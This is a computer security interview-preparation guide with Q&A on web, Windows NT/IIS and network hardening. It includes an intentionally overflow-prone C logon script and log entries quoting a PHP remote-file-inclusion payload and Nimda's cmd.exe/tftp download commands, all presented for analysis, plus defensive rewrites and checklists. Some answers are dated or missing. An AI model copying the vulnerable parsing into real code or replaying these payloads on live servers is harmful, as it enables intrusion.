Vital Computer security Interview Preparation Guide

This Computer Security Interview Questions and Answers guide will help you prepare. Computer security is the branch of computer technology known as information security as applied to computers and networks; its objective includes protecting information and property from theft and corruption. Learn more about computing security, information security, NT security, web security and network security with the help of this guide.

89 Computer security Questions and Answers:

Vital Computer security Job Interview Questions and Answers

1 :: What happens if a firewall, once it runs out of queue space, blocks further SYN packets?


2 :: How can I secure my client computers against my users?

One way to make it harder for a local user to do any harm to the system is to give them a PC with no hard disk or floppy disk. To boot, the system then has to talk to a boot server over the network, so there is no local storage to tamper with or to boot an alternative system from.

3 :: Review the source of the logon_validate script below. Do you see any problems with it?

You have been asked to review the source code for a compiled script that is being used to validate logon credentials for a web application. The file is called "logon_validate" and a typical logon request looks like this –

"GET /cgi-bin/logon_validate?login=test&password=test"

The source code is shown below –

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Placeholders for the credentials the script compares against. */
#define GOOD_USER "test"
#define GOOD_PASS "test"

void show_error(void) {
    // AUTHENTICATION ERROR
    exit(-1);
}

int main(int argc, char **argv) {
    char error_on_auth = '1';
    char user[128];
    char pass[128];
    char *ch_ptr_begin;
    char *ch_ptr_end;
    /* QUERY_STRING is the CGI environment variable carrying "login=...&password=..." */
    char *query_string = getenv("QUERY_STRING");

    if (query_string == NULL)
        show_error();

    /**********************************/
    /* Get Username from Query String */
    /**********************************/
    ch_ptr_begin = strstr(query_string, "login=");
    if (ch_ptr_begin == NULL)
        show_error();
    ch_ptr_begin += 6;
    ch_ptr_end = strstr(ch_ptr_begin, "&");
    if (ch_ptr_end == NULL)
        show_error();
    *(ch_ptr_end++) = '\0';
    strcpy(user, ch_ptr_begin);

    /**********************************/
    /* Get Password from Query String */
    /**********************************/
    ch_ptr_begin = strstr(ch_ptr_end, "password=");
    if (ch_ptr_begin == NULL)
        show_error();
    ch_ptr_begin += 9;
    ch_ptr_end = strstr(ch_ptr_begin, "&");
    if (ch_ptr_end != NULL) *(ch_ptr_end++) = '\0';
    strcpy(pass, ch_ptr_begin);

    if ((strcmp(user, GOOD_USER) == 0) &&
        (strcmp(pass, GOOD_PASS) == 0))
        error_on_auth = '0';

    if (error_on_auth == '0') {
        // AUTHENTICATION OK!!
    } else {
        // AUTHENTICATION ERROR
        show_error();
    }

    // return(0); hehe could be evil ;PPPPP
    exit(0);
}
This pseudo-code is taken from the NGSec Web Auth Games
http://quiz.ngsec.biz:8080/game1/level6/replicant.php

Do you see any problems with this script?
How could an attacker exploit this script to bypass its authentication mechanism?
What are some mitigation options?

Note: Goal of question – This is most likely the most complex question being asked during the interview due to the fact that the applicant will need to apply multiple layers of analysis, including both the attacker and defender perspectives.
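A bounds-checked rewrite of the same credential check, added here to illustrate the mitigation side of the question. This is not the NGSec game code; GOOD_USER/GOOD_PASS, FIELD_MAX, get_param(), ct_equal(), validate_query() and login_of_length_accepted() are this example's own names and assumptions. It closes the two gaps the original leaves open: a value's length is checked before anything is copied into the 128-byte stack buffers, and a parse failure is simply a failed login rather than undefined behaviour.

```c
/* Added example (not the NGSec game code): a bounds-checked rewrite of the
 * credential parsing in logon_validate. GOOD_USER/GOOD_PASS are placeholder
 * values; main() reads the CGI QUERY_STRING, while validate_query() takes the
 * string as a parameter so it can be exercised without a web server. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define GOOD_USER "test"
#define GOOD_PASS "test"
#define FIELD_MAX 128

/* Copy the value of "<key>=" from qs into out (capacity outsz). Returns 0 on
 * success, -1 if the key is absent or the value would not fit. The length is
 * checked before any byte is copied, the input is never modified, and the key
 * must start a parameter, so "xlogin=" or a "password=" appearing first cannot
 * confuse it the way the bare strstr() scan in the original can. */
int get_param(const char *qs, const char *key, char *out, size_t outsz) {
    size_t klen = strlen(key);
    const char *p = qs;
    while (p != NULL && *p != '\0') {
        const char *end = strchr(p, '&');
        size_t plen = end ? (size_t)(end - p) : strlen(p);
        if (plen > klen && strncmp(p, key, klen) == 0 && p[klen] == '=') {
            size_t vlen = plen - klen - 1;
            if (vlen >= outsz) return -1;      /* reject rather than truncate */
            memcpy(out, p + klen + 1, vlen);
            out[vlen] = '\0';
            return 0;
        }
        p = end ? end + 1 : NULL;
    }
    return -1;
}

/* Equality check whose running time depends only on strlen(expected), so the
 * response latency does not reveal how many leading bytes were correct. */
int ct_equal(const char *expected, const char *got) {
    size_t elen = strlen(expected), glen = strlen(got);
    unsigned char diff = (unsigned char)(elen != glen);
    for (size_t i = 0; i < elen; i++) {
        unsigned char g = (i < glen) ? (unsigned char)got[i] : 0;
        diff |= (unsigned char)((unsigned char)expected[i] ^ g);
    }
    return diff == 0;
}

/* 1 if qs carries valid credentials, 0 otherwise. A missing or oversized
 * field is a failed login, not a crash or an overflow. */
int validate_query(const char *qs) {
    char user[FIELD_MAX], pass[FIELD_MAX];
    int ok_user, ok_pass;
    if (get_param(qs, "login", user, sizeof user) != 0) return 0;
    if (get_param(qs, "password", pass, sizeof pass) != 0) return 0;
    ok_user = ct_equal(GOOD_USER, user);   /* both compared, no short-circuit */
    ok_pass = ct_equal(GOOD_PASS, pass);
    return ok_user & ok_pass;
}

/* Exercise the bound: does a login value of n bytes fit in a FIELD_MAX buffer?
 * 1 = accepted, 0 = rejected. (Constructed input, for testing only.) */
int login_of_length_accepted(size_t n) {
    char qs[1024], user[FIELD_MAX];
    if (n > 900) return 0;
    memcpy(qs, "login=", 6);
    memset(qs + 6, 'A', n);
    strcpy(qs + 6 + n, "&password=test");
    return get_param(qs, "login", user, sizeof user) == 0;
}

int main(void) {
    const char *qs = getenv("QUERY_STRING");
    if (qs == NULL || !validate_query(qs)) {
        printf("Content-Type: text/plain\r\n\r\nAUTHENTICATION ERROR\n");
        return 1;
    }
    printf("Content-Type: text/plain\r\n\r\nAUTHENTICATION OK\n");
    return 0;
}
```

Three choices are deliberate: an oversized field is rejected rather than truncated (truncation silently changes what gets compared), the key is matched only at the start of a parameter, and the comparison's timing does not depend on where the first mismatching byte sits.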

4 :: What application generated the log file entry below? What type of attack is this?

What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?

========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "unamex20-a" at POST_PAYLOAD
mod_security-action: 403

65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a
----------------------------------------



Note: Goal of question – to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The ModSecurity Apache module generated this data in its audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script; the commands being passed are in the POST payload of the request. This attack was not successful for the following two reasons:

· The mod_security-message header indicates that ModSecurity blocked this request (HTTP 403) based on a converted Snort web-attack rule when it identified the "uname -a" string in the POST payload.
· The attacker also made a typo in the OS commands being passed in the POST payload: there is no semicolon ";" between the ls and uname commands, so even an unprotected target would have failed to execute the nonexistent "lsuname" command.

5 :: Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. What does the log entry suggest has happened?

Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry?

68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 566 "-" "-"



Note: Goal of question – to see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect the Apache proxy itself, since they target a Microsoft IIS vulnerability. However, the logs show that the initial request was answered with a status code of 200, and the Nimda worm only sends the second-stage request (using Trivial FTP to pull its payload onto the target) when the initial request succeeds. Depending on the exact proxying rules in place, the internal IIS server should be inspected to verify that it has not been compromised.

If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?

You could use Microsoft's Internet Security and Acceleration (ISA) Server as a front-end proxy, or implement URLScan on the target IIS server. Directives in urlscan.ini such as AllowDotInPath (reject paths with dots in directory segments, which blocks directory traversal attempts) and the [DenyExtensions] list (reject requests for .exe files) would stop requests like these.
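The two log entries in questions 4 and 5 share the Common Log Format request line, so one small analyzer covers both. The following is an added example, not code from the page, from ModSecurity or from Apache: parse_clf(), nimda_stage_of(), status_of(), rfi_attempt(), cmd_chain_count() and modsec_action() are this example's own names, and the embedded sample lines are the entries quoted above, with the wrapped Nimda requests rejoined onto one line each.

```c
/* Added example: detector for the two log entries discussed in questions 4
 * and 5. parse_clf() reads the CLF request line used both by the Apache
 * access log and by the "Request:" line of a ModSecurity audit_log entry.
 * Sample lines below are the ones quoted on the page (Nimda lines rejoined). */
#include <stdio.h>
#include <string.h>

struct clf {
    char ip[64];
    char method[16];
    char path[512];
    int status;
};

/* '<ip> - - [date] "<method> <path> HTTP/x.y" <status> <bytes> ...' -> fields.
 * Returns 0 on success, -1 if the line does not have that shape. */
int parse_clf(const char *line, struct clf *out) {
    const char *sp, *q1, *q2;
    memset(out, 0, sizeof *out);
    sp = strchr(line, ' ');
    if (sp == NULL || (size_t)(sp - line) >= sizeof out->ip) return -1;
    memcpy(out->ip, line, (size_t)(sp - line));
    q1 = strchr(sp, '"');
    if (q1 == NULL) return -1;
    q2 = strchr(q1 + 1, '"');
    if (q2 == NULL) return -1;
    if (sscanf(q1 + 1, "%15s %511s", out->method, out->path) != 2) return -1;
    if (sscanf(q2 + 1, " %d", &out->status) != 1) return -1;
    return 0;
}

/* Nimda probe classification: 0 = not one, 1 = cmd.exe request served with
 * 200 (the proxied IIS host answered it), 2 = the tftp second stage, which the
 * worm only sends after a successful probe, also served with 200.
 * -1 = the line did not parse. */
int nimda_stage_of(const char *line) {
    struct clf r;
    if (parse_clf(line, &r) != 0) return -1;
    if (r.status != 200 || strstr(r.path, "cmd.exe") == NULL) return 0;
    return strstr(r.path, "tftp") != NULL ? 2 : 1;
}

/* Status code of a CLF line, or -1 if it does not parse. */
int status_of(const char *line) {
    struct clf r;
    return parse_clf(line, &r) == 0 ? r.status : -1;
}

/* A urlencoded body in which a parameter value is a URL has the shape of a
 * PHP remote file inclusion attempt (lid=http://.../lila.jpg?). */
int rfi_attempt(const char *body) {
    return strstr(body, "=http://") != NULL || strstr(body, "=https://") != NULL
        || strstr(body, "=ftp://") != NULL;
}

/* Number of ';'-separated commands in the cmd= parameter (0 if none).
 * "cd /tmp;id;lsuname -a" gives 3: with no ';' between ls and uname,
 * "lsuname -a" is a single command, and not one the target can run. */
int cmd_chain_count(const char *body) {
    const char *p = strstr(body, "cmd=");
    int n;
    if (p == NULL) return 0;
    p += 4;
    if (*p == '\0' || *p == '&') return 0;
    for (n = 1; *p != '\0' && *p != '&'; p++)
        if (*p == ';') n++;
    return n;
}

/* ModSecurity records its verdict in the audit entry; 403 means the request
 * was denied before index.php ever saw it. Returns 0 if no action is logged. */
int modsec_action(const char *entry) {
    const char *p = strstr(entry, "mod_security-action: ");
    int code = 0;
    if (p != NULL && sscanf(p, "mod_security-action: %d", &code) == 1) return code;
    return 0;
}

static const char AUDIT_REQUEST[] =
    "200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] \"POST /index.php HTTP/1.1\" 403 743";
static const char AUDIT_HEADERS[] =
    "mod_security-message: Access denied with code 403. Pattern match \"unamex20-a\" at POST_PAYLOAD\n"
    "mod_security-action: 403\n";
static const char AUDIT_BODY[] =
    "lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a";
static const char NIMDA_PROBE[] =
    "68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] \"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 200 566 \"-\" \"-\"";
static const char NIMDA_TFTP[] =
    "68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] \"GET /c/winnt/system32/cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0\" 200 566 \"-\" \"-\"";

int main(void) {
    printf("audit: status %d, WAF action %d, RFI %d, %d chained commands\n",
           status_of(AUDIT_REQUEST), modsec_action(AUDIT_HEADERS),
           rfi_attempt(AUDIT_BODY), cmd_chain_count(AUDIT_BODY));
    printf("nimda: probe stage %d, tftp stage %d\n",
           nimda_stage_of(NIMDA_PROBE), nimda_stage_of(NIMDA_TFTP));
    return 0;
}
```

Run against the page's entries it reports status 403 with WAF action 403, an RFI-shaped body with three chained commands (the third being the broken "lsuname -a"), and for the Nimda pair a stage-1 probe followed by a stage-2 tftp request, both answered with 200, which is exactly the combination that should trigger a look at the backend IIS host.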

6 :: What online resources do you use to keep abreast of web security issues? Can you give an example of a recent web security vulnerability or threat?

Note: Goal of question – Determine if the applicant utilizes computer security resources such as CERT, SANS Internet Storm Center or ICAT. Email lists such as securityfocus, bugtraq, SANS @RISK, etc. are also good resources. Recent examples of threats will vary depending on current events, but issues such as new web based worms (PHP Santy Worm) or applications, which are in wide use (awstats scripts) are acceptable.

7 :: What is the Microsoft Baseline Security Analyzer?

The Microsoft Baseline Security Analyzer (MBSA) is a Microsoft tool with both graphical and command-line interfaces that can perform local or remote scans of Windows systems, reporting missing hotfixes and vulnerabilities in certain Microsoft products. See the Microsoft Baseline Security Analyzer page on TechNet for more information.

8 :: What is the IIS Lockdown Tool?

This tool is part of the IIS Lockdown Wizard; it works by turning off unnecessary features of the IIS server, thereby reducing the attack surface available to an attacker. It also works in conjunction with URLScan to provide multiple layers of defense. The IIS Lockdown Tool page on TechNet describes its features and characteristics and provides steps for download and setup.

9 :: How do I secure Windows 2000 and IIS 5.0?

Security is a huge concern for anyone involved in business processes, management, and administration. A good resource of information on maintaining security in Windows 2000 and IIS is the security section of the Windows 2000 site. Also see Internet Information Services (IIS) on the Microsoft TechNet site, where you can find information on securing IIS servers in addition to resources that will help you maintain a secure system and stay current with any releases, updates, and tools.

10 :: Are server-side includes insecure?

Server side includes, snippets of server directives embedded in HTML documents, are another potential hole. A subset of the directives available in server-side includes instruct the server to execute arbitrary system commands and CGI scripts. Unless the author is aware of the potential problems it's easy to introduce unintentional side effects. Unfortunately, HTML files containing dangerous server-side includes are seductively easy to write.

Some servers, including Apache and NCSA, allow the webmaster to selectively disable the types of includes that can execute arbitrary commands (in Apache, Options IncludesNOEXEC permits includes while refusing the exec directive).

11 :: Are some Web server software programs more secure than others?

Yes, although it would be foolhardy to give specific recommendations on this point. As a rule of thumb, the more features a server offers, the more likely it is to contain security holes. Simple servers that do little more than make static files available for requests are probably safer than complex servers that offer such features as on-the-fly directory listings, CGI script execution, server-side include processing, and scripted error handling.

Version 1.3 of NCSA's Unix server contains a serious known security hole. Discovered in March of 1995, this hole allows outsiders to execute arbitrary commands on the server host. If you have a version 1.3 httpd binary whose creation date is earlier than March 1995 don't use it! Replace it with the patched 1.3 server or with version 1.4 or higher (available at the same site). The Apache plug-in replacement for NCSA is also free of this bug.

Servers also vary in their ability to restrict browser access to individual documents or portions of the document tree. Some servers provide no restriction at all, while others allow you to restrict access to directories based on the IP address of the browser or to users who can provide the correct password. A few servers, primarily commercial ones (e.g. Netsite Commerce Server, Open Market), provide data encryption as well.

The WN server, by John Franks, deserves special mention in this regard because its design is distinctively different from other Web servers. While most servers take a permissive attitude to file distribution, allowing any document in the document root to be transferred unless it is specifically forbidden, WN takes a restrictive stance. The server will not transfer a file unless it has been explicitly placed on a list of allowed documents. On-the-fly directory listings and other "promiscuous" features are also disallowed.

12 :: Exactly what security risks are we talking about?

There are basically three overlapping types of risk:

1. Bugs or misconfiguration problems in the Web server that allow unauthorized remote users to:
* Steal confidential documents not intended for their eyes.
* Execute commands on the server host machine, allowing them to modify the system.
* Gain information about the Web server's host machine that will allow them to break into the system.
* Launch denial-of-service attacks, rendering the machine temporarily unusable.

2. Browser-side risks, including:
* Active content that crashes the browser, damages the user's system, breaches the user's privacy, or merely creates an annoyance.
* The misuse of personal information knowingly or unknowingly provided by the end-user.

3. Interception of network data sent from browser to server or vice versa via network eavesdropping. Eavesdroppers can operate from any point on the pathway between browser and server, including:
* The network on the browser's side of the connection.
* The network on the server's side of the connection (including intranets).
* The end-user's Internet service provider (ISP).
* The server's ISP.
* Either ISPs' regional access provider.

It's important to realize that "secure" browsers and servers are only designed to protect confidential information against network eavesdropping. Without system security on both browser and server sides, confidential documents are vulnerable to interception.

Protecting against network eavesdropping and system security are the subject of sections 1 to 5 of the WWW Security FAQ from which this answer is drawn; client-side security is covered in its sections 6 and 7, and section 8 deals with security alerts for specific Web servers.

13 :: Security interview questions for network admins

1. What is a firewall?

2. Describe, generally, how to manage a firewall

3. What is a Denial of Service attack?

4. What is a "spoofed" packet?

5. What is a SYN Flood?

6. What do you do if you are a victim of a DoS?

7. What is GPG/PGP?

8. What is SSH?

9. What is SSL? How do you create certificates?

10. What would you do if you discovered a UNIX or network device on your network has been compromised?

11. What would you do if you discovered a Windows system on your network has been compromised?

12. What is DNS hijacking?

13. What is a log host?

14. What is IDS or IDP, and can you give me an example of one?

15. Why are proxy servers useful?

16. What is web caching?

14 :: Disaster Recovery Planning questions

* Do we have a written disaster recovery plan?
  o Are copies in the possession of departmental management? At their homes?
* When was our plan last updated?
* Does our plan include:
  o A list of who in the department is empowered to declare a disaster? A list of critical personnel who will need to respond to a disaster?
    - Telephone numbers (home, cell) for all critical personnel?
  o An inventory of all our critical business functions?
  o An inventory of the computer systems that support those functions?
    - Including not only servers but critical desktop computers (e.g. departmental secretaries' computers)?
  o A rank-ordered list of which business functions we would restore first in the event of a disaster?

* Suppose we had to evacuate the building due to a major disaster (fire, flood, chemical or biological event renders the building inaccessible). Suppose all our systems are offline. How long would it take to restore basic departmental business functions and data from our offsite backup tapes?

15 :: Data Security questions

* What confidential personal information (e.g., Social Security numbers) do we store on our servers? Do we minimize use of SSNs to the extent feasible? Could we use another identifier, such as MSU PID numbers instead?

o If we do need to store confidential data such as SSNs locally, how secure are the servers that house the information?
* Instead of storing personal confidential information locally, could we do business in some other way? Could we eliminate those confidential data elements from our local databases? Could we instead routinely access data as needed from University data services (thus obviating the need for the local copies)?
* Have all personnel within the unit been adequately trained in University data security requirements and applicable state or federal laws and regulations (e.g. FERPA, HIPAA, Gramm-Leach-Bliley Act)?

16 :: Network Security questions

* Do we use hardware firewalls to protect critical servers and desktop computers?
o How often do we examine event logs and real-time displays to see if we are under attack?
o Do we use software firewalls to protect end-user computers (e.g. laptops that may spend time away from protection of the departmental hardware firewall)?
* Do we monitor the network for security exposures using auditing tools such as ISS or Nessus?
* Do we monitor the network for unusual patterns of traffic? (E.g. a server or an end user computer suddenly begins emitting huge amounts of traffic.)
* Do we ensure that all critical business transactions take place using encrypted transmission? (E.g. SSL for Web or email transactions, SSH or VPN for remote login, encrypted file transfers)?

17 :: Backups questions

* How often do we back up our servers? How often do we back up the desktop computers that we use for departmental business functions?
  o A common practice is weekly backups of all data, and daily backups of files or data that have changed.
* What backup media do we use? Is hardware to read that media commonly available?
* When did we last test our backup procedures to make sure data can be restored?
* Are our backups in "image" format (requiring identical hardware or software to restore)? Could we load our backups into another system if need be?
* Do we take backup tapes offsite? Where? How often?
* How often do we back up end user desktops? Or is this the responsibility of end users?

18 :: Anti-Virus questions

* Do we run anti-virus software? Which tool(s) do we use?
  o On all servers? On all critical desktops?
  o On all end user desktops?
* Are our virus definitions current?
  o How often are the definitions updated? (At least twice weekly is advised; many experts suggest daily updates.)
* Do we run spyware detection software on our servers and on end user computers?
* How are servers and end-user computers given new antivirus definitions? (From the vendor's Web site, from a local server, or otherwise?)
* Have we enabled automatic scanning for virus definition updates on servers and end-user computers?
* Do we scan incoming and outgoing email for viruses (as well as other modes of transmission)?
* Do we educate our users about virus avoidance (e.g. be wary of attachments in general, don't run .EXE files sent via email, etc.)?
* Do we restrict the ability of end users to install new software on their computers, so as to limit the capacity of viruses to install themselves?
  o E.g. using Microsoft's Group Policy options?

19 :: Securing New Systems questions

* When we acquire a new server or desktop computer, do we follow a defined set of procedures to set it up?

* How do we "lock down" a new system? Do we:
  o Turn on or install software firewalls? And/or use a hardware firewall?
  o Turn off unnecessary services (e.g. FTP on a desktop computer that doesn't need to support this protocol)?
  o Rename administrator user names as appropriate? Change default passwords?
  o Follow product-specific advice or expert checklists on how to secure new servers and applications? (For instance, software vendors and outside experts offer white papers or checklists on how to secure a Windows XP workstation or a Linux server.)
* Do we test new systems for security using tools such as the Microsoft Baseline Security Analyzer, etc.?

20 :: Where is the password that I configure a service to start with stored?

HKLM\SECURITY\Policy\Secrets\_SC_<servicename>\CurrVal contains the encrypted password of the service. The password is not machine or account dependent, i.e. a user foo with password bar in domain X on NT 3.51 has the same encrypted value as user baz with password bar in domain Y on NT 4.0.

21 :: Can I grant access to someone to view or change the logfiles?

Yes you can, but there is an error on the manual on how to do it. Check out Knowledge Base article Q142615 to see why the "Manage auditing and security log" privilege does not work as documented.

22 :: What can be done to get better security on remote (RAS) connections?

There are a number of things to do to get better security on remote connections:

* Put the RAS servers on one or more interfaces of their own on the firewall
* Be sure to turn on auditing for the RAS function
* Enable authentication
* Enable session encryption
* Enable dialback
* Specify which hours remote users are allowed to connect

To turn on auditing for RAS, use the regedit utility to set the value

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\RasMan\Parameters\Logging

to 1, then restart RAS.

23 :: What are AFTP, NVAlert and NVRunCmd?

When installing the complete SNA package, you get at least three more services: AFTP, NVAlert and NVRunCmd.

* AFTP, like its TCP/IP counterpart FTP, is a tool to transfer files over the network. It might be used for anonymous logins as well.
* NVRunCmd is a service that lets someone running the NetView network monitoring tool send ordinary commands over the network that will be executed locally on the Windows NT machine.

Make sure that you have disabled these services if you want to run a more secure setup.

24 :: What is Rollback.exe?

On the NT 4.0 CD-ROM there is a utility called rollback.exe that will corrupt your system if run. It is not intended for end users, but someone slipped and the tool is now out on many users' systems.

Without any warning, rollback.exe removes all system registry entries, which leaves the system in a state from which there is no easy way to recover. One has to grab the emergency repair disk and do a restore from the latest backup.

25 :: Web server security

There are a number of problems with web servers. Bugs in the server, badly written CGI scripts, erroneous configurations and other exposed services (e.g. database connections) are just a few things that might be used to damage your security.

You might want to look at the WWW Security FAQ to get some general security information on the WWW.

If you install a Windows NT machine as a web server or a firewall, you should tighten up the security on that box more than you would for ordinary machines on your internal network, since a machine accessible from the Internet is more exposed and more likely to be attacked. Securing the machine gives you a bastion host. Some of the things you should do include:

* Remove all protocol stacks except TCP/IP, since IP is the only protocol that runs on the Internet
* Remove unneeded network bindings
* Disable all unnecessary accounts, like Guest
* Remove share permissions and default shares
* Remove network access for Everyone (User Manager -> Policies -> User Rights, "Access this computer from the network")
* Disable unnecessary services (FTP, etc.)
* Enable audit logging
* Review the audit information regularly